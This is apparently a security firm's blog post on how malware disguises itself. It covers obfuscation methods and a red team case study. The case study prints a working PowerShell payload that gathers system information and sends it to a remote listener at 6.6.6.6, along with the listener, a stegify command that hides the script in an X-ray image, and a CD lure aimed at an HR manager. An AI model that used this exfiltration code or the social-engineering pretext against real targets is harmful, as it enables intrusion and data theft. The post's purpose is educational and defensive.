Halloween and Cyber-Security: Malware in Disguise

Dan Shallom

December 28, 2020

TL;DR:

  • Intro to malware
  • The art of disguise – learn about how malware hides itself
  • Ready to look at some real malware? Don’t be a scaredy cat!
  • ♫ Who you gonna call? Us, of course.

Ghostly greetings one and all. On Halloween night, children the world over dress up in scary costumes and prowl from house to house, asking wary residents for treats. This is known as “Trick-or-Treating”. The most interesting part is that the word “trick” is used to imply a “threat” of mischief the children will perform on the residents or their home if no treat is handed over.

As we will shortly see, costumes are not just for kids or adults! Software can don a disguise as well, and in contrast to the traditional Halloween “trick or treat” declaration, it won’t give you a heads-up as to what’s about to happen if you don’t comply.

Malware for dummies

As most of you are aware, some software packages are assembled to cause great damage to unsuspecting users. These are known as malware. Now, malware can be categorized into several types: viruses, worms, Trojan horses, ransomware, extortionware, logic bombs, spyware… the list goes on and on.

We won’t get into every type of malware in this article. Our takeaway here is beware –

“The devil has many faces”

Vampire, Ghost or a Backdoor?

In this section let’s take a look at the different disguises malware adopts and the various methods of obfuscation it makes use of. But first, you may be asking yourself, why does malware need to disguise itself in the first place? The answer is quite simple! To cloak its behavioral patterns so it can slip past the firewalls, anti-malware countermeasures, intrusion detection systems and other controls that would otherwise expose its dastardly intentions and shut it down.

So without further ado let’s explore some of the most common methods of obfuscation:

  • Dead-code💀insertion – dead code is useless code woven into the application that obscures its flow, makes it more entangled and increases its overall size. It doesn’t, however, alter its behavior.
  • Command changes – an attacker can use alternative instructions for the procedures implemented in the code. This does not change the behavior of the program either, only the appearance of the code behind it.
  • ROT13 cipher – a cipher that replaces each letter with the letter 13 places after it in the alphabet (wrapping around). It does not have any effect on numbers or punctuation. Since 26 = 2 × 13, this is easy to decipher: you just need to apply ROT13 a second time to the ciphered data. An attacker can use this encoding in order to hide data from countermeasures that look for certain commands or signatures.
  • XOR (exclusive or) cipher – XOR is first of all a logical operation, but it can be used as a cipher. It outputs “TRUE” only when its two inputs differ. An attacker can encrypt the malicious code by choosing a key and XORing the code with it; XORing the result with the same key decrypts it.
  • Base64 (radix-64) encoding – the idea of Base64 is to represent binary data as plain text, hence it is considered a binary-to-ASCII encoding scheme. It uses an alphabet of 64 characters. It can usually be identified by the “=” padding at the end of the string (present whenever the input length is not a multiple of three bytes).
  • Packers – most of the time, this refers to a compression of the code, which of course also shrinks its size. Packers unpack themselves automatically at the time of execution, with no user intervention.
  • Steganography – this method is used to conceal one file in another. In terms of security, for example, a malicious file can be stored inside an image file. The photo is used as a “carrier” for dangerous data. Malware that uses this method is called Stegomalware.
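The decoding side of the ROT13, XOR and Base64 bullets above, written as an added example for this post (it is not code from the original article or from OP Innovate): an analyst-side helper that peels the three layers off a suspicious string by looking for indicator substrings in every candidate decoding. The indicator keywords and the sample blob are constructed for illustration; the sample wraps the page’s own systeminfo command in ROT13, then single-byte XOR, then Base64.

```python
import base64
import codecs
import re

# Constructed indicator list: substrings an analyst expects in the decoded payload
# (taken from the PowerShell shown on this page).
INDICATORS = ("systeminfo", "TcpClient", "StreamWriter")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")

def looks_like_base64(text: str) -> bool:
    """Base64 uses a 64-character alphabet, length % 4 == 0 and at most two '=' pads."""
    return len(text) % 4 == 0 and B64_RE.fullmatch(text) is not None

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def rot13(text: str) -> str:
    """ROT13 is its own inverse, so one function both encodes and decodes."""
    return codecs.decode(text, "rot_13")

def contains_indicator(text: str) -> bool:
    return any(ind in text for ind in INDICATORS)

def unwrap(blob: str):
    """Peel Base64, single-byte XOR and ROT13 off a string; return (layers, plaintext) or None."""
    layers = []
    data = blob.encode()
    if looks_like_base64(blob):
        data = base64.b64decode(blob)
        layers.append("base64")
    for key in range(256):  # key 0 means "no XOR layer"
        candidate = xor_bytes(data, bytes([key])) if key else data
        try:
            text = candidate.decode("ascii")
        except UnicodeDecodeError:
            continue  # a wrong key produces non-ASCII garbage
        xor_layer = [f"xor:0x{key:02x}"] if key else []
        if contains_indicator(text):
            return layers + xor_layer, text
        if contains_indicator(rot13(text)):
            return layers + xor_layer + ["rot13"], rot13(text)
    return None

# Constructed sample: the page's systeminfo command wrapped in ROT13, XOR 0x2a and Base64.
SAMPLE_PLAIN = "systeminfo.exe /FO CSV"
SAMPLE_BLOB = base64.b64encode(xor_bytes(rot13(SAMPLE_PLAIN).encode(), b"\x2a")).decode()
```

`unwrap(SAMPLE_BLOB)` reports the layers removed in decode order and the recovered command; with a real sample the indicator list would be drawn from the detection rule that fired.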

And for my next trick…

So now it’s time to demonstrate a practical scenario that uses malware obfuscation, in this case using Steganography. 

OP Innovate Red Team was engaged by an organization to conduct a Red Team exercise. 

The challenge: Steal sensitive corporate data.

To do this we’d need to bypass the corporate security controls, take over the internal network domain, and somehow exfiltrate the data undetected by data leakage protection (DLP) measures. Our recon showed that the organization’s perimeter is protected by firewalls and that endpoint computers inside have endpoint protection including antivirus software and other anti-malware countermeasures installed. So we decided to obfuscate the malicious file using multiple methods. 

For demonstration purposes we will focus on one particular piece of obfuscated malware – a StegoMalware.

This malware works by grabbing sensitive information from inside the system and sending it back to the attacker.

  • First, the attacker collects intelligence. Turns out that the HR manager’s son has broken his hand. Photos on social media show the poor fellow in a cast.
  • Next, the attacker weaponizes a CD containing the malicious payload and spins up a server that listens for incoming connections.
" ___________   _____                            _       
|  _  | ___  |_   _|                          | |      
| | | | |_/ /   | | _ __  _ __   _____   ____ _| |_ ___ 
| | | |  __/    | || '_ | '_  / _   / / _` | __/ _ 
 _/ / |      _| || | | | | | | (_)  V / (_| | ||  __/
 ___/_|      ___/_| |_|_| |_|___/ _/ __,_|_____|
                                                        " 

#listening server – waits for one inbound connection, reads a single line, then shuts down

$port=6666
# Bind to every local interface on the chosen port
$IPEndPoint=New-Object System.Net.IPEndPoint([System.Net.IPAddress]::Any,$port)
$TcpListener=New-Object System.Net.Sockets.TcpListener $IPEndPoint
$TcpListener.Start()
# Blocks until the payload connects back
$AcceptTcpClient=$TcpListener.AcceptTcpClient()
$GetStream=$AcceptTcpClient.GetStream()
$StreamReader=New-Object System.IO.StreamReader $GetStream
# Output the single line the payload writes (the collected system information)
$StreamReader.ReadLine()
# Release the stream, the client socket and the listener
$StreamReader.Dispose()
$GetStream.Dispose()
$AcceptTcpClient.Dispose()
$TcpListener.Stop()
" ___________   _____                            _       
|  _  | ___  |_   _|                          | |      
| | | | |_/ /   | | _ __  _ __   _____   ____ _| |_ ___ 
| | | |  __/    | || '_ | '_  / _   / / _` | __/ _ 
 _/ / |      _| || | | | | | | (_)  V / (_| | ||  __/
 ___/_|      ___/_| |_|_| |_|___/ _/ __,_|_____|
                                                        " 

#attacker’s payload – collects system information and sends it to the listener

function Get-SystemInfo
{
  param($ComputerName = $env:ComputerName)

  # Column names for the CSV row that systeminfo.exe emits
  $header = 'Hostname','OSName','OSVersion','OSManufacturer','OSConfig','Buildtype',
            'RegisteredOwner','RegisteredOrganization','ProductID','InstallDate',
            'StartTime','Manufacturer','Model','Type','Processor','BIOSVersion',
            'WindowsFolder','SystemFolder','StartDevice','Culture','UICulture',
            'TimeZone','PhysicalMemory','AvailablePhysicalMemory','MaxVirtualMemory',
            'AvailableVirtualMemory','UsedVirtualMemory','PagingFile','Domain',
            'LogonServer','Hotfix','NetworkAdapter'
  # Run systeminfo in CSV mode, drop its own header row and turn the row into an object
  systeminfo.exe /FO CSV /S $ComputerName |
        Select-Object -Skip 1 |
        ConvertFrom-Csv -Header $header
}

# Connect back to the attacker’s listener (6.6.6.6:6666 is the address used in this write-up)
$TcpClient = New-Object System.Net.Sockets.TcpClient
$TcpClient.Connect("6.6.6.6",6666)
$GetStream = $TcpClient.GetStream()
$StreamWriter = New-Object System.IO.StreamWriter $GetStream
$positions = Get-SystemInfo
# Send the collected information as a single line, then close the connection
$StreamWriter.WriteLine($positions)
$StreamWriter.Dispose()
$GetStream.Dispose()
$TcpClient.Dispose()
  • Next, the attacker has the CD delivered to the HR office, for the attention of the HR manager. The CD appears to come from her local X-ray lab.
  • The HR manager pops the CD into her computer and tries to view the contents.
  • The HR manager receives an alert from her computer’s endpoint protection and the malicious files are blocked.

The challenge: The malware has been successfully delivered to the HR manager but the anti-malware countermeasures prevent it from running.

The sleight of hand – it’s all in the wrist!

The bypass: Using some form of obfuscation in order to cloak the malware.

  • The CD contains two artifacts: The X-ray image that has been altered using steganography to contain a malicious payload, and an executable file masquerading as a special image viewer. The CD has an instruction label on it – “To view the X-ray image file, please run the built-in image viewer”.
  • When the executable file is clicked, it simply extracts a PowerShell script that has been hidden in the image using an open source steganography tool called stegify. This tool uses the LSB (least significant bit) technique to obfuscate the malicious file inside the photo. The result? The human eye cannot detect any visual difference between the original image and the one that contains the script.
stegify encode --carrier .\pic_original.png --data .\systemInfo.ps1 --result pic_malicious.png
  • The image viewer is also opened in order to display the image and mask the evidence of the malicious activity.
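The LSB technique that stegify relies on, shown as an added example for this post (this is not stegify’s code nor code from the original article): a payload is written one bit at a time into the least significant bit of each pixel value, so no value moves by more than 1, which is why the eye cannot tell the two images apart. The carrier is a constructed greyscale gradient rather than a real photo, and the entropy check at the end is only a crude illustration of what a defender can measure; real photographs already carry noisy least-significant bits, so on its own it is a weak detector.

```python
import math

def embed_lsb(carrier: bytes, payload: bytes) -> bytearray:
    """Hide payload in the LSB of each carrier byte, after a 32-bit big-endian length header."""
    bits = []
    for byte in len(payload).to_bytes(4, "big") + payload:
        bits.extend((byte >> shift) & 1 for shift in range(7, -1, -1))  # MSB first
    if len(bits) > len(carrier):
        raise ValueError("carrier too small for payload")
    stego = bytearray(carrier)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit  # only the LSB changes, so each value moves by at most 1
    return stego

def extract_lsb(stego: bytes) -> bytes:
    """Read the length header, then that many bytes, from the LSBs."""
    def read_bytes(offset: int, count: int) -> bytes:
        out = bytearray()
        for n in range(count):
            value = 0
            for shift in range(8):
                value = (value << 1) | (stego[offset + n * 8 + shift] & 1)
            out.append(value)
        return bytes(out)
    length = int.from_bytes(read_bytes(0, 4), "big")
    return read_bytes(32, length)

def max_channel_difference(original: bytes, stego: bytes) -> int:
    """Largest per-value change between carrier and stego image; 1 or less is invisible."""
    return max(abs(a - b) for a, b in zip(original, stego))

def lsb_entropy(data: bytes) -> float:
    """Shannon entropy (bits) of the LSB plane: 0 for a flat plane, near 1 when it looks random."""
    p = sum(b & 1 for b in data) / len(data)
    if p in (0.0, 1.0):
        return 0.0
    return -(p * math.log2(p) + (1 - p) * math.log2(1 - p))

# Constructed carrier: a smooth 64x64 greyscale gradient with every LSB clear (one byte per pixel).
CARRIER = bytes((x + y) // 2 * 2 for y in range(64) for x in range(64))
PAYLOAD = b"systeminfo.exe /FO CSV"  # stands in for the hidden PowerShell script
STEGO = embed_lsb(CARRIER, PAYLOAD)
```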


  • Finally the malicious payload is executed and the sensitive data is exfiltrated to the attacker’s remote server.

Takeaways

  • Code obfuscation can be used for mitigation – obfuscation is not always used with bad intentions in mind. It can also serve as a defensive measure that reduces the risk from decompilers and frustrates attackers who want to reverse engineer a program, since the decompiled code is rendered unintelligible.
  • Files are not always as they seem – as you already know, files can contain malicious code yet still present as harmless to the naked eye.
  • Heuristic scanning, an advanced solution – this technique goes a step beyond signature-based detection. It raises a flag when it encounters a suspicious behavior pattern in a program, which makes it useful for identifying new malware and revealing encoded/encrypted malware.
  • Social awareness – most humans have a deeply curious and trusting nature that sometimes has negative effects on them and/or the security posture of their sensitive information.

About Us 

OP Innovate was established in 2014 to defend global enterprises from the increasing challenges of organizational cybersecurity. Our team has unmatched expertise in cyber research, penetration testing, incident response, training and forensics. Our team members are exposed to cutting-edge responses to today’s most critical cybersecurity concerns allowing us and our partners to remain ahead of the bad guys.

Written by Dan Shallom, Cyber security researcher | Certified Ethical Hacker (CEH).